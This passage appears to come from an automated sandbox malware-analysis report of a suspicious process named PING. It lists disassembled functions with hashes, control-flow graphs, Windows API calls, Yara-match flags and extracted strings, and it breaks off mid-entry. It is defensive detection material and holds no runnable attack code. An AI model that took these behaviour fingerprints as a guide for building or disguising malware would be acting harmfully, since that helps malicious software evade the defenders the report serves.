                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 95b154c3cdf3405ebba7e5f25928f6b9aa356fcfd2f0a045db94a862794c21d0
                                          • Instruction ID: c53a1d8165f03a8e4908c1f9899c112b86491451373618da9aced1d419bc407b
                                          • Opcode Fuzzy Hash: 95b154c3cdf3405ebba7e5f25928f6b9aa356fcfd2f0a045db94a862794c21d0
                                          • Instruction Fuzzy Hash: DE9004F1343510434105715C4415717400FC7F0701F55C131F10145D0DCD35CDD57135
                                          Function 02C12EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 837712bbfab67fe30bc5ab9deb62efc68263965dff9519471c55e4cfe35fcca9
                                          • Instruction ID: c6e01b3ba6144d0d0cc528b4007861662fd1fb1c6dfe61f431f8b53acaf2df83
                                          • Opcode Fuzzy Hash: 837712bbfab67fe30bc5ab9deb62efc68263965dff9519471c55e4cfe35fcca9
                                          • Instruction Fuzzy Hash: 359002A124191443D14075584805607000587D0702F55C111A2064555E8E298D556135
                                          Function 02C12FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: bf21c312327f55207bc03e558a254e09e93c0dbeea4b8cfc87dce8392f16c535
                                          • Instruction ID: 21f4f61fc318b05d68b738ccee28bb5095c2d59daa9154df26dcdf076b906b1c
                                          • Opcode Fuzzy Hash: bf21c312327f55207bc03e558a254e09e93c0dbeea4b8cfc87dce8392f16c535
                                          • Instruction Fuzzy Hash: 3D900471351D10C3D300757C4C15F070005C7D0703F55C315F0154554CCD15CD755531
                                          Function 02C12FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: ee5608e2ccb9e4336f2f85d003c8d62ce9e4cfa40033959dae87847e353d49fb
                                          • Instruction ID: 87ae3aa48d4803a68e14924a5375d79999f5f5e50315f707995deef8064783de
                                          • Opcode Fuzzy Hash: ee5608e2ccb9e4336f2f85d003c8d62ce9e4cfa40033959dae87847e353d49fb
                                          • Instruction Fuzzy Hash: 02900261641510824140716888459074005ABE1611755C221A0998550D8D5989695675
                                          Function 02C12F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4763b88aeebc25dd8fb65becd5029bacd91ee16b93f8e5ed8ca9bc55a3bfd381
                                          • Instruction ID: ad2550a78a4915bacf2abeded4caae0243bcafc464e2047c62bb2bc480b42f59
                                          • Opcode Fuzzy Hash: 4763b88aeebc25dd8fb65becd5029bacd91ee16b93f8e5ed8ca9bc55a3bfd381
                                          • Instruction Fuzzy Hash: F19002A138151482D10071584415B070005C7E1701F55C115E1064554D8E19CD566136
                                          Function 02C12CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d41826472f1c6ad3ecc1d4ce4b7aaa4bbdf3db3baed4ac44cbc5a098d319ae26
                                          • Instruction ID: 1210f6a8d90e41a1eb7e0f2759442722a11c995ce1c5451781638df0320728fa
                                          • Opcode Fuzzy Hash: d41826472f1c6ad3ecc1d4ce4b7aaa4bbdf3db3baed4ac44cbc5a098d319ae26
                                          • Instruction Fuzzy Hash: D290047134151443D10075DC540D7470005C7F0701F55D111F5034555FCF75CDD57131
                                          Function 02C12C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 6e06d25b6cd64acb1957719681ce9840a61f6981ff0d4fff8294b4d8eedb6726
                                          • Instruction ID: 432f6e40eeb5e954eda134fe711a7b281d0c131702b59b8c7253f1d399f9a036
                                          • Opcode Fuzzy Hash: 6e06d25b6cd64acb1957719681ce9840a61f6981ff0d4fff8294b4d8eedb6726
                                          • Instruction Fuzzy Hash: 7C90047134151CC3D100715C4405F470005C7F0701F55C117F0134754DCF15CD557531
                                          Function 02C12C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: c893832f77ee34c6942648347016fa45c6f5043b4a3be27653e2dc86c7b51bcc
                                          • Instruction ID: e1dec9412bf801bfb12751bc64fdd4f6a20ea0f585f646966ca5c83efc104e19
                                          • Opcode Fuzzy Hash: c893832f77ee34c6942648347016fa45c6f5043b4a3be27653e2dc86c7b51bcc
                                          • Instruction Fuzzy Hash: D090027124159842D1107158840574B000587D0701F59C511A4424658D8E9589957131
                                          Function 02C12DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: c1a5efe9d2b048f2cf99f7793b6a106f2635928dc7e799662b784ed49178f608
                                          • Instruction ID: c86e2a1e8d5d866451c0a47f9ea3bd5f7503608054533ec84850807c74cd53d2
                                          • Opcode Fuzzy Hash: c1a5efe9d2b048f2cf99f7793b6a106f2635928dc7e799662b784ed49178f608
                                          • Instruction Fuzzy Hash: C0900261282551925545B1584405507400697E0641795C112A1414950C8D26995AD631
                                          Function 02C12DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 5709f89bfb2c826ea6327f9a95bfc51ce7a38b3a162da27ea5cdfbb0bf68b99d
                                          • Instruction ID: 7fbbe0933724d5e48f3bf8e55e1da17eec709ca5375a373f39fef32cf675cf44
                                          • Opcode Fuzzy Hash: 5709f89bfb2c826ea6327f9a95bfc51ce7a38b3a162da27ea5cdfbb0bf68b99d
                                          • Instruction Fuzzy Hash: 4690027124151453D11171584505707000987D0641F95C512A0424558D9E568A56A131
                                          Function 02C12D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 0a77b3839f1f725731a7b160780c9b39ff8928dd997c1521e3aa181c1459982f
                                          • Instruction ID: c1dd1b3c440d80509e2515153da2b7ac23256d5756f1b17a14f0826d8231f4ca
                                          • Opcode Fuzzy Hash: 0a77b3839f1f725731a7b160780c9b39ff8928dd997c1521e3aa181c1459982f
                                          • Instruction Fuzzy Hash: A790026925351042D1807158540960B000587D1602F95D515A0015558CCD15896D5331
                                          Function 02C12D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 2e34537f07a7c126d8fab71e6544ec48135f3840d0c93ed4f9ff6524c646a5da
                                          • Instruction ID: abbaef16ffe0ec4a5079ab465ef0207755943ee5ecd227501043c561cdbd76d5
                                          • Opcode Fuzzy Hash: 2e34537f07a7c126d8fab71e6544ec48135f3840d0c93ed4f9ff6524c646a5da
                                          • Instruction Fuzzy Hash: 3990047134151043D140715C541D7074005D7F1701F55D111F0414554CDD15CD5F5333
                                          Function 02C135C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 614dbbdb429b5c571f6c78453e39c64f559add37833ddb386a9a1ff198cc86a4
                                          • Instruction ID: 4437a8f1b8f08221ee19d53af3932870214d14571e9e91fb2070233538003bb3
                                          • Opcode Fuzzy Hash: 614dbbdb429b5c571f6c78453e39c64f559add37833ddb386a9a1ff198cc86a4
                                          • Instruction Fuzzy Hash: 0890027164561442D10071584515707100587D0601F65C511A0424568D8F958A5565B2
                                          Function 02C139B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 28536fa457f180f2561d40ddf41bd1b62528c54c53474e9039c31222b808b63b
                                          • Instruction ID: 483799a4c09e07b997c33193e050e40d125241d432d9af7a42474b734f9ec247
                                          • Opcode Fuzzy Hash: 28536fa457f180f2561d40ddf41bd1b62528c54c53474e9039c31222b808b63b
                                          • Instruction Fuzzy Hash: F290026128556142D150715C44056174005A7E0601F55C121A0814594D8D5589596231
                                          Function 00493500 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 108sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 433 493500-493548 call 49ae50 436 49354e-4935c5 call 49af30 call 483f50 call 471410 call 491660 433->436 437 493654-49365a 433->437 446 4935d0-4935e4 Sleep 436->446 447 493645-49364c 446->447 448 4935e6-4935f8 446->448 447->446 449 49364e 447->449 450 49361a-493633 call 495a60 448->450 451 4935fa-493618 call 4959c0 448->451 449->437 454 493638-49363b 450->454 451->454 454->447
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 004935DB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: &}}~$net.dll$wininet.dll
                                          • API String ID: 3472027048-1471689447
                                          • Opcode ID: 733b980ceacce79c792ac3ab9880a04dac2209a9f4b6b923c0c3c06aa0fabb3a
                                          • Instruction ID: a686c764261946dda0340cc0ef4306555ed648645afbec16532197004af2ad65
                                          • Opcode Fuzzy Hash: 733b980ceacce79c792ac3ab9880a04dac2209a9f4b6b923c0c3c06aa0fabb3a
                                          • Instruction Fuzzy Hash: 23318DB1600305BBDB14DFA5CC80FEBBBB8BB85714F14812DB6196B241D7746A41CBA9
                                          Function 00480782 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 456 480782-4807fa call 49af80 call 49b990 call 483f50 call 471410 call 491660 467 48081a-480820 456->467 468 4807fc-48080b PostThreadMessageW 456->468 468->467 469 48080d-480817 468->469 469->467
                                          APIs
                                          • PostThreadMessageW.USER32(Z426iIL7,00000111,00000000,00000000), ref: 00480807
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID: Z426iIL7$Z426iIL7
                                          • API String ID: 1836367815-738817621
                                          • Opcode ID: f202fae4bc7f6fcc54dd93d1e1b509dfb7c8cb090e00964b93935d68a7cc6b8c
                                          • Instruction ID: 986936543d2ca3a1ce76328dcde6a9b5890985a12017754fca3cedee07a1e65a
                                          • Opcode Fuzzy Hash: f202fae4bc7f6fcc54dd93d1e1b509dfb7c8cb090e00964b93935d68a7cc6b8c
                                          • Instruction Fuzzy Hash: DD1186B2D0021DBAEB01AAD58C81DEF7B7CEF41794F04856AF618A7101D6295E0687E5
                                          Function 00480790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 470 480790-4807a2 471 4807aa-4807fa call 49b990 call 483f50 call 471410 call 491660 470->471 472 4807a5 call 49af80 470->472 481 48081a-480820 471->481 482 4807fc-48080b PostThreadMessageW 471->482 472->471 482->481 483 48080d-480817 482->483 483->481
                                          APIs
                                          • PostThreadMessageW.USER32(Z426iIL7,00000111,00000000,00000000), ref: 00480807
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID: Z426iIL7$Z426iIL7
                                          • API String ID: 1836367815-738817621
                                          • Opcode ID: 493ddfe56fbc02f417c547f00954e90e157f335a28a000d9db335e44f9e6d4b5
                                          • Instruction ID: a8eaed33805419ec2938df202f03182963ff824748063a29212a475e7afc3ad6
                                          • Opcode Fuzzy Hash: 493ddfe56fbc02f417c547f00954e90e157f335a28a000d9db335e44f9e6d4b5
                                          • Instruction Fuzzy Hash: B00184B2D0021D7AEB11AAE58C81DEFBB7CEF41794F04846AFA14A7241D6285E0687E5
                                          Function 004813D0 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 268networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WSAStartup.WS2_32(00000202,?), ref: 004816DA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Startup
                                          • String ID: ZPK
                                          • API String ID: 724789610-297889628
                                          • Opcode ID: 88b6ebde5fdda95ea1d8457e27f337ecc79eabf421ececc7035c6bfec81aae24
                                          • Instruction ID: 77490d9577a4dd0eaace97c37e6709ef43db378f67f9533d463baca069033e28
                                          • Opcode Fuzzy Hash: 88b6ebde5fdda95ea1d8457e27f337ecc79eabf421ececc7035c6bfec81aae24
                                          • Instruction Fuzzy Hash: F491B3B1D00205ABDB10EFA5CC45BEEBBF8BF44704F04452FE508A7251EB785656CBA9
                                          Function 00499210 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessInternalW.KERNELBASE(?,?,?,?,^}H,00000010,?,?,?,00000044,?,00000010,00487D5E,?,?,?), ref: 00499273
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID: ^}H
                                          • API String ID: 2186235152-2079659185
                                          • Opcode ID: e44c0d24ac9a83e4dbc0106651f8f6e45fdf516143e9af47306da256b49cd6e5
                                          • Instruction ID: c61fda9aa7c3e404359268dc0c2d1b8f03b69c03c510036d4d0bb9301287c3fc
                                          • Opcode Fuzzy Hash: e44c0d24ac9a83e4dbc0106651f8f6e45fdf516143e9af47306da256b49cd6e5
                                          • Instruction Fuzzy Hash: 9701C4B2200108BFCB54DF99DC81EDB77ADAF8C754F008109BA09E3240D670F851CBA4
                                          Function 0048EF29 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 116COMMON
                                          Download Yara Rule
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 0048EF47
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Initialize
                                          • String ID: @J7<
                                          • API String ID: 2538663250-2016760708
                                          • Opcode ID: dd0144e5529cee17762b5b65aafb3f30690918e395ae57dc747e0fe3eb918eb4
                                          • Instruction ID: 216ce951510255de4e12dffec4ef73d067a11b2e9a662ecb8f2e20b36296d71e
                                          • Opcode Fuzzy Hash: dd0144e5529cee17762b5b65aafb3f30690918e395ae57dc747e0fe3eb918eb4
                                          • Instruction Fuzzy Hash: CC4142B6A00209AFDB10DFD9D8809EFB7B9FF88304B10455AE905EB315D775EE458BA0
                                          Function 0048EF30 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                          Download Yara Rule
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 0048EF47
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Initialize
                                          • String ID: @J7<
                                          • API String ID: 2538663250-2016760708
                                          • Opcode ID: ec6766677c07e489ca9da14c3b414f78c5e867f71e76f26d24433c20151fe122
                                          • Instruction ID: 8947d24a27eaf4d100390cbddf58e48e831136b347b03f3e72f060a000d16adb
                                          • Opcode Fuzzy Hash: ec6766677c07e489ca9da14c3b414f78c5e867f71e76f26d24433c20151fe122
                                          • Instruction Fuzzy Hash: AD3150B5A0020AAFDB00DFD9D8809EFB7B9FF88304B108559E505EB314D775EE058BA0
                                          Function 0048163D Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WSAStartup.WS2_32(00000202,?), ref: 004816DA
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Startup
                                          • String ID:
                                          • API String ID: 724789610-0
                                          • Opcode ID: d5a77c2508db5565939c9f28682d20aeb535eb40bd0bdd7323ae3ccf6847c5dc
                                          • Instruction ID: 30cc69d1950d35b4396c8e534641039bc34495cc164495dad61e21a79c82c304
                                          • Opcode Fuzzy Hash: d5a77c2508db5565939c9f28682d20aeb535eb40bd0bdd7323ae3ccf6847c5dc
                                          • Instruction Fuzzy Hash: EA11E771D01209EFCB01EBE58C42BDEB7B8AF49700F14415BE608B7242E7746E1587EA
                                          Function 00483F50 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00483FC2
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 0d697ff97b7bf7ef080c10395bac8f7f97858c555f2fc09287bfaac7e5fb147e
                                          • Instruction ID: c3125f03a815884ddf1b77c35734aa294474b54de7911c6e080540b29966dbe5
                                          • Opcode Fuzzy Hash: 0d697ff97b7bf7ef080c10395bac8f7f97858c555f2fc09287bfaac7e5fb147e
                                          • Instruction Fuzzy Hash: 210152B5E0020DABDF10EBA1DC42F9EB7789B14708F0045A5FA0897241F634EB148B95
                                          Function 00479C10 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00479C52
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: 37362aaafeed4a5e23fb9a2d9634cbe18d972f57c5eb88243c94a6eb64895a28
                                          • Instruction ID: a137946f2cef61b9fe17e4b9ba82b8928c29476d3b3c40bd926e7a9648cc01a0
                                          • Opcode Fuzzy Hash: 37362aaafeed4a5e23fb9a2d9634cbe18d972f57c5eb88243c94a6eb64895a28
                                          • Instruction Fuzzy Hash: A4F0653338031436E620659A9C02FDB778CCB81BA5F15402AF70CEB1C0D895B80142E8
                                          Function 00479C0B Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                          Download Yara Rule
                                          APIs
